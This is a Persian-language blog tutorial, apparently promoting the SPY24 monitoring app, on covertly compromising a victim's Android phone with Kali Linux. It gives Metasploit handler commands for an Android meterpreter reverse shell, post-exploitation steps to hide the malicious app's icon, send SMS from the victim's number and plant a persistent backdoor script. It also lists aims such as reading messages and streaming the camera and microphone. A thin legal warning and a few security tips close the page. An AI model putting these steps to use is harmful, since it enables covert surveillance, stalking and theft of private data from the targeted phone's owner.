برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

چطور در کالی لینوکس واتس آپ را هک کنیم؟

چطور در کالی لینوکس واتس آپ را هک کنیم ؟

تلفن های اندرویدی فناوری های بسیار عجیب  دارند ، امروزه گوشی های اندرویدی سهم قابل توجهی در بازار تلفن های هوشمند را پیدا کرده اند . بنابراین هدف قرار دادن تلفن اندرویدی گزینه بسیار خوبی برای هکرها می باشد ، ما در مقالات گذشته سایت در مورد هکر ها ، انواع هک در واتس آپ جلوگیری از هک و.. مقالات زیادی را نوشته ایم ، ولی در این آموزش قصد داریم شیوه نفوذ به گوشی های اندرویدی را به صورت راه دور توسط کالی لینوکس بیان کنیم.

سیستم عامل اندروید

سیستم عامل اندروید یکی از سیستم عامل های محبوب در جهان است که روزانه به مخاطبان آن افزوده میشود. این سیستم عامل برای موبایل طراحی شده و البته امکان نصب ان در هر سیستمی وجود دارد به همین دلیل محبوبیت داشته و مخاطبان آن بسیار بیشتر از سایر رقبایش هستند.

به علت متن باز بودن اندروید خطر در کمین این سیستم عامل است و متاسفانه اندروید هم از این قاعده مستثنی نبوده و انواع مختلف بدافزارها ، ویروس ها و برنامه های مخرب برای آن نوشته شده و خواهد شد.

در این آموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس آشنا خواهید شد و مباحث مرتبط را به صورت مبتدی تا حرفه یاد خواهید گرفت.

آیا هک اندروید امکان دارد؟

متاسفانه پاسخ بله است! این روز ها آنقدر راه های هک و نفوذ متنوع و زیاد شده است که هیچ دستگاه الکترونیکی نمی تواند ۱۰۰ درصد خودش را ایمن نامگذاری کند. گوشی های اندروید هم مانند سایر دستگاه ها به راحتی یا سختی هک می شوند اما روش های گوناگونی وجود دارد و هر روشی نیاز به ابزاری خاص و دانش کار با آن ابزار دارد.

اولین و اساسی ترین ابزار سیستم عامل لینوکس نسخه Kali Linux می باشد حالا جالب و البته نگران کننده این است که هسته اندروید نیز لینو کسی بوده و این موضوع نفوذ به اندروید را بسیار آسان کرده است.

 

قبل از اینکه به سراغ کالی لینوکس برویم، باید بدانید که لینوکس چیست و چه کارایی هایی دارد؟

می توان گفت که لینوکس یک سیستم‌عامل شبه یونیکس می باشد که قسمت زیادی از آن سازگار با استاندارد پازیکس است. از نظر فنی لینوکس فقط یک نام برای هستهٔ سیستم‌عامل و نه کل آن است. هسته‌ای که نخستین بار در سال ۱۹۹۱ میلادی توسط لینوس توروالدز منتشر شد.

اما معمولا این نام به سیستم‌عامل‌هایی که از ترکیب‌بندی لینوکس (به عنوان هسته سیستم‌عامل) با نرم‌افزارهای آزاد و متن‌باز بدست می‌آیند اطلاق می‌شود. با اینکه بنیاد نرم‌افزار آزاد سیستم‌عامل حاصل از این ترکیب‌بندی را «گنو/لینوکس» می‌نامد اما عموماً آن را لینوکس می‌خوانند. این دوگانگی در نام نهادن منجر به بحث نامگذاری گنو/لینوکس شده‌ است.

لینوکس در ابتدا فقط برای استفادهٔ ریزپردازنده‌هایی با معماری ۸۰۳۸۶ اینتل طراحی شده بود؛ اما امروزه انواع گوناگون معماری‌ها را پشتیبانی می‌کند و در انواع و اقسام وسایل از کامپیوترهای شخصی گرفته تا ابر رایانه ها

کالی لینوکس چیست؟

کالی لینوکس یک توزیع از لینوکس در زمینه تست امنیت و نفوذ می باشد که بر اساس دبیان پایه گذاری شده است. کالی را می‌توان نسخه بعدی Backtrack دانست که دیگر آپدیت نخواهد شد. این سیستم عامل در انواع نسخه‌های حرفه‌ای و یا lite ارائه شه است و حتی نسخه‌ای مخصوص گوشی‌ موبایل و نسخه‌ای برای فلش نیز دارد. برتری که این سیستم عامل نسبت به سایر سیستم عامل ها دارد، رایگان بودن آن است.

چیزهایی که شما نیاز دارید

  1. دسک تاپ یا لپ تاپ در حال اجرا بر روی Kali Linux. اگر PC Windows دارید ، باید از VMWare استفاده کنید و Kali Linux را روی آن نصب کنید.
  2. یک اتصال اینترنتی فعال
  3. یک دستگاه Android برای انجام عملی خود

کالی لینوکس ابزارهای بسیاری برای انجام تست های نفوذ دارد که هر یک از این ابزارها ویژگی های خاص و قدرت متفاوتی دارند. تمام افرادی که در زمینه هک و امنیت فعالیت دارند، می بایست کالی لینوکس را به طور کامل بشناسند، چرا که این سیستم عامل قدرت بسیار بالایی در نفوذ به سیستم ها دارد. کالی لینوکس در واقع هم برای هکرها و هم برای متخصصین امنیت ابزاری فوق العاده می باشد و امکانات بسیاری را در اختیار هر دوی آنها قرار می دهد.

شما می‌توانید کلیه ابزارها و امکانات موجود در کالی لینوکس را روی توزیعی مثل UBUNTU نصب نمایید، اما باید بدانید که نصب کردن پکیج‌های مختلف با پیش نیازهایشان کمی درد سر ساز می باشد. کالی لینوکس مجموعه‌ای از تمام ابزارهای رایگان و کاربردی تست نفوذ و امنیت را به صورت یکجا، نصب شده و آماده استفاده برایتان جمع آوری کرده است. علاوه بر این کار ارتباط ابزارهای تست را نیز برای شما به صورت پیش فرض انجام داده است. در ادامه برخی از مهم ترین ابزارهای این سیستم عامل را معرفی می کنیم.

چطور در کالی لینوکس واتس آپ را هک کنیم ؟

معرفی برخی از ابزارهایی که در کالی لینوکس وجود دارد:

  • ابزار NMAP جهت جمع آوری اطلاعات و بررسی شبکه و شناسایی همه گره های فعال در شبکه
  • ابزار Burp Suite برای نفوذ به سیستم های مبتنی بر وب که از پروتکل HTTP استفاده می کنند.
  • ابزار Wireshark  جهت تحلیل بسته های مختلف استفاده می شود.
  • ابزار Maltego برای جمع آوری اطلاعات پیش از شروع عملیات نفوذ
  • ابزار THC Hydra جهت انجام حملات بروت فورس
  • ابزار wasp Zap برای تشخیص آسیب پذیری‌ها در برنامه های مختلف
  • ابزار Sqlmap جهت تشخیص مشکلاتی که در پایگاه داده وجود دارد
  • Aircrack-ng جهت آزمون نفوذ و تلاش برای شکستن کلمه عبور شبکه‌های بیسیم
  • ابزار Metasploit Framework، سیستم جامع نفوذ متااسپلویت
  • ابزار John the Ripper جهت شکستن پسوردها استفاده می شود

اگر با موفقیت کار را کامل کنید ، می توانید کارهای زیر را در دستگاه خود انجام دهید.

o        مخاطبین و سایر اطلاعات شخصی را کپی کنید
o        برای کلیک روی یک تصویر از دوربین استفاده کنید.
o        پخش مستقیم صدا با استفاده از میکروفون.
o        تمام پیام ها را بخوانید
o        جریان فیلم ها و دسترسی به همه پرونده ها.
 

توجه : در این آموزش من از Acer Laptop به عنوان Attacker PC که Kali linux در آن نصب شده است استفاده می کنم ، و Coolpad Note 3 تلفن اندرویدی به عنوان تلفن اندرویدی مورد نفوذ برای نشان دادن چگونگی عملکرد آن استفاده کرده ام.

 

چطور در کالی لینوکس واتس آپ را هک کنیم ؟ تا به اینجا به طور کامل با سیستم عامل کالی لینوکس آشنا شدید، حال وقت آن است که روش انجام هک با کالی لینوکس را نیز فرابگیرید. برای هک با کالی لینوکس مراحلی که در ادامه خواهیم گفت را به ترتیب انجام دهید تا موفق به هک با کالی لینوکس این سیستم قدرتمند شوید.

ابتدا نسخه کالی لینوکس را روی سیستم خود نصب نمایید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کنید. با استفاده از این ابزار، اقدام به ساخت یک برنامه هک اندروید به صورت APK نمایید. برای ساخت چنین ابزاری تنها نیاز دارید که دستور زیر را در محیط ترمینال لینوکس وارد نمایید.

در دستور فوق به جای عبارت LHOST می توانید از آدرس آی پی خودتان و در قسمت LPORT از پورت اینترنت خودتان استفاده کنید. Name.apk نام ابزاری است که شما به عنوان هکر آن را می سازید تا با آن اقدام به هک نمایید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

·         Msf>use exploit/multi/handler
·         Msf>set PAYLOAD android/meterpreter/reverse_tcp
·         Msf>set LHOST ۱۹۲.۱۶۸.۱.۳۵
·         Msf>set LPORT ۴۴۳

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کنید. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هکنیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک نماید.

ابزار هک و نفوذ

برنامه SPY۲۴:

در ابتدا امیدوارم که قوانین سایت spy۲۴ را مطالعه کرده باشید.
که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد
و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت spy۲۴ بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY۲۴) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد

که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY۲۴ را مشاهده نمایید:

·         نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان

·         گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…

·         موقعیت لحظه مستمر و مسیر های پیموده شده

·         وب سایت های بازدید شده و برنامه های اجرا شده

·         با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور

·         امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

توجه کنید: اگر تصمیم به هک با مقاصد غیر اخلاقی و غیر حرفه ای دارید و هدف شما ایجاد امنیت نیست بلکه بر هم زدن امنیت کشور و آرامش مردم است، توصیه می کنیم حتماً  با جرائم سایبری و مجازات های سنگین آن در ایران آشنا شوید و بدانید که در ایران بیش از تعداد هکر ها،  متخصین امنیت داریم که اول از هر چیز آرامش و امنیت هموطنان ما برایشان اهمیت دارد و با تجهیزات نرم افزاری و سخت افزاری گوناگون و بسیار قدرتمند در صورت مشاهده هر گونه جرم سایبری در کم تر از چند ساعت یا حتی چند دقیقه شما را شناسایی و به عنوان مجرم سایبری تحویل مقامات ذیربط خواهند داد.

چطور در کالی لینوکس واتس آپ را هک کنیم ؟

استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :

دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .

دستور اول : hide_app_icon

با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.

دستور دوم : check_root

با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟

تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.

دستور سوم : send_sms -d number -t ” body text sms ”

دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.

نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.

ایجاد بک دور بر روی اندروید قربانی

در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :

/ cd

سپس در این مرحله باید با استفاده از دستور زیر به مسیر sdcard وارد شوید :

cd /sdcard

سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.

upload /root/Desktop/backdoor.sh /sdcard

دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.

در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .

سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :

/ cd

cd /sdcard

در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :

sh lifetime.sh

در نهایت باید با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.

آموزش امنیت و جلوگیری از هک اندروید

برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :

از انتی ویروس های اورجینال اندرویدی استفاده کنید

از نصب برنامه های نامعتبر و کرک شده خود داری کنید

با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.

از دریافت برنامه به غیر از پلی استور خود داری کنید

بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید

از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند

دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید

پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا